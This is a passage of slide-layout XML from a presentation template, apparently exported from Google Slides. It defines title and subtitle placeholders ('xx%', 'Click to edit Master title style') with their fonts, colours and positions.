              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="3602539"/>
            <a:ext cx="10290000" cy="48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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Google Shape;397;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950969" y="2769461"/>
            <a:ext cx="10290000" cy="10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000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="5518905"/>
            <a:ext cx="10290000" cy="48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867">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950969" y="4685828"/>
            <a:ext cx="10290000" cy="10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000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7884867" y="-548500"/>
            <a:ext cx="7018800" cy="35968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1" name="Google Shape;401;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6922433" y="3080667"/>
            <a:ext cx="9870800" cy="5058800"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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2" name="Google Shape;402;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-1232133" y="5330600"/>
            <a:ext cx="4439600" cy="20824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20688141"/>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403"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955400" y="707633"/>
            <a:ext cx="102812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405" name="Google Shape;405;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2241867" y="3309467"/>
            <a:ext cx="4541200" cy="4403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406" name="Google Shape;406;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8659633" y="-1576333"/>
            <a:ext cx="4541200" cy="4403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407" name="Google Shape;407;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7272933" y="-2385767"/>
            <a:ext cx="7153200" cy="33552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8" name="Google Shape;408;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1237400" y="4754367"/>
            <a:ext cx="2012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409" name="Google Shape;409;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011800" y="5267320"/>
            <a:ext cx="2464000" cy="52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410" name="Google Shape;410;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915769" y="4754367"/>
            <a:ext cx="2012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411" name="Google Shape;411;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8690163" y="5267320"/>
            <a:ext cx="2464000" cy="52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412" name="Google Shape;412;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086835" y="4754367"/>
            <a:ext cx="2012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b="1">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n-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861228" y="5267320"/>
            <a:ext cx="2464000" cy="52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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5342017" y="3330500"/>
            <a:ext cx="1508000" cy="5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3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489800" y="3330497"/>
            <a:ext cx="1508000" cy="5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3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="9" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9168151" y="3330497"/>
            <a:ext cx="1508000" cy="5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3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
